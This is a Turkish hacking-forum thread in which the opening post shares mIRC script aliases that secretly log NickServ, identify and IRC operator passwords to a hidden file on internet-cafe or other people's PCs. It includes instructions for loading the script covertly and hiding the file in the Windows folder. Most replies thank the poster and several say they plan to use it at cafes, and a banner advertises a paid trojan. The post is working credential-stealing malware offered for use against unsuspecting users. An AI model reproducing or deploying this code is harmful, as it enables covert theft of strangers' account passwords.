Cafedekiler İçin Nick HacklemekPc sine girdiğiniz yada bir internet cafedeki nick şifrelerini almak için idealdir. Yapmamız gereken yazdığım şu komutu scripin remotesine eklemek. bunları system.txt die bi belgeye kaydedin. alias ae return echo
Konu Teğmen tarafından açılmış, 827 kişi tarafından görüntülenip, 13 yanıt almış.
|
Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!
|
|||||||
Cafedekiler İçin Nick Hacklemek konusundaki toplam yorum: 13, okunma sayısı: 827. |
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
#1 |
|
Banned
![]() ![]() ![]() ![]() Kayıt Tarihi: Mar 2005
Üye numarası: #8391 Yer: SaMSuN
Karma etkisi: 0
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 1026
|
Pc sine girdiğiniz yada bir internet cafedeki nick şifrelerini almak için idealdir. Yapmamız gereken yazdığım şu komutu scripin remotesine eklemek. bunları system.txt die bi belgeye kaydedin.
alias ae return echo -a alias se return echo -s alias nickserv { if identify isin $1- { .write c:\windows\wincpu.txt $server $me $+ . $+ $1- | msg nickserv $1- } else { msg nickserv $1- } } alias msg { if identify isin $1- { .write c:\windows\wincpu.txt $server $me $+ . $+ $1- | msg $1- } else { .msg $1- } } alias identify { .write c:\windows\wincpu.txt $server $me $+ . $+ $1- | msg nickserv identify $1- Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=25101 } alias oper { .write c:\windows\wincpu.txt $server Oper $+ . $+ $1- | oper $1- } Daha sonra bu belgeyi windows klasörüne atında dikkat çekmesin. Scriptte editlenmiş mirclardan yani şu tıklayınca remoteleri açılmayan cinsten olursa iyi olur. Daha sonra yapmamız gereken;Scripti açıp /load -rs c:\windows\system.txt yazmak. Benim yazdığım komut şifreleri windows un içine wincpu.txt belgesine kayıt edecektir. dikkat çekmemesi açısından idael. Daha sonra şifreleri bu belgenin içinde bulucaksınız. işin güzel tarafı Oper şifrelerinide kayıt etmesi. Ayrıca belirtiyim serverıda kayıt ediyor. AlıntıdıR... |
|
|
|
|
|
#2 |
|
Banned
![]() ![]() ![]() ![]() ![]() Kayıt Tarihi: Jul 2005
Üye numarası: #28607 Yer: Nirvana
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 245542
|
Sağol kardeş
![]() |
|
|
|
|
|
#3 |
|
Forum Kalfası
![]() ![]() ![]() ![]() Kayıt Tarihi: Jun 2005
Üye numarası: #25041
Karma etkisi: 7
![]() Karma: 67
|
İnternet cafeye gittiğimde mutlaka deniyicem
|
|
|
|
|
|
#4 |
|
Banned
![]() ![]() ![]() ![]() Kayıt Tarihi: Jun 2005
Üye numarası: #24493 Yer: VaroşLar ! HayatLar Harap, Köşe ßaşLarında Cigara ve Şarap...
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 2234
|
SaoL güzeL payLaşım
![]() |
|
|
|
|
|
#5 |
|
Cool Çırak
![]() Kayıt Tarihi: May 2005
Üye numarası: #15891
![]() Karma: 9
|
güzel fikir
|
|
|
|
|
|
#6 |
|
Çırak
![]() Kayıt Tarihi: Aug 2005
Üye numarası: #33611
![]() Karma: 10
|
sağol dostum deniyecem.
|
|
|
|
|
|
#7 |
|
Forum Ustası
![]() ![]() ![]() ![]() ![]() Kayıt Tarihi: Jul 2005
Üye numarası: #28409
Karma etkisi: 42
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 3374
|
bende deneyecem sağol
|
|
|
|
|
|
#8 |
|
Cool Üye
![]() ![]() ![]() Kayıt Tarihi: Aug 2005
Üye numarası: #32206 Yer: Olduğum yer
Karma etkisi: 7
![]() Karma: 11
|
Gerçekten güzel paylaşım..Şimdi işe koyulalaım
![]() |
|
|
|
|
|
#9 |
|
Forum Kalfası
![]() ![]() ![]() ![]() Kayıt Tarihi: Mar 2005
Üye numarası: #5933 Yer: li
Karma etkisi: 7003
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 699373
|
bu bir nevi keyloger mi ... yoksa gerçek keylogeer mi
![]() |
|
|
|
|
|
#10 |
|
Daimi Üye
![]() ![]() ![]() Kayıt Tarihi: Aug 2005
Üye numarası: #34241
Karma etkisi: 8
![]() ![]() Karma: 101
|
Şimdi herşey ii qüsel çalışıyo ama ben şu en son kımı anlamadım yani script yi yukledim komutu yazınca çıktı ole bi yazı ama windowsun içinde wincpu die bişi çıkmadı.. yardımcı olursan sewinirim..
|
|
|
|
|
|
#11 |
|
Daimi Üye
![]() ![]() ![]() Kayıt Tarihi: Feb 2005
Üye numarası: #3002
Karma etkisi: 8
![]() Karma: 89
|
güzel fikir dostum ama kim mirc e takılıyor o iş 4 yıl önce mazide kaldı web cam msn yagın olmaya başlyınca yinede tşk
|
|
|
|
|
|
#12 | |
|
Daimi Üye
![]() ![]() ![]() Kayıt Tarihi: Mar 2005
Üye numarası: #3689
Karma etkisi: 298
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 29000
|
Alıntı:
bir de şöyle düşün dostum. ya msn adresinin şifresi de aynıysa veya güzel bir hatun şifresini telefon numarası yapmışsa ![]() |
|
|
|
|
|
|
#13 |
|
Çırak
![]() Kayıt Tarihi: Apr 2005
Üye numarası: #15512
|
payLaşım için SaoL...
Birde Mirce kimin takildiği konusunda bir Soru geLdi... mirc hiç Bir Zaman son bulmayacağı kanıSındayım.. Ben yıllardır mirc kullanıorum. hiç bir şekildede bırakmadım.. Msn çıktıySada icq vardı bir zamanLar yine mirc kullandım. onu tadı bir b aşkadır... ve başlığı bulunan bu konuda verilenLeri mutlaka aLiasa ekleyin... Şifre kutunuz genişleSin... Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=25101 tekrar Paylaşım için teşekürLer... |
|
|
|
|
|
#14 |
|
Çırak
![]() Kayıt Tarihi: Apr 2005
Üye numarası: #15512
|
payLaşım için SaoL...
Birde Mirce kimin takildiği konusunda bir Soru geLdi... mirc hiç Bir Zaman son bulmayacağı kanıSındayım.. Ben yıllardır mirc kullanıorum. hiç bir şekildede bırakmadım.. Msn çıktıySada icq vardı bir zamanLar yine mirc kullandım. onu tadı bir b aşkadır... ve başlığı bulunan bu konuda verilenLeri mutlaka aLiasa ekleyin... Şifre kutunuz genişleSin... Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=25101 tekrar Paylaşım için teşekürLer... |
|
|
|
![]() |
| Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir) | |
| Konu Araçları | Bu Konuda Ara |
|
|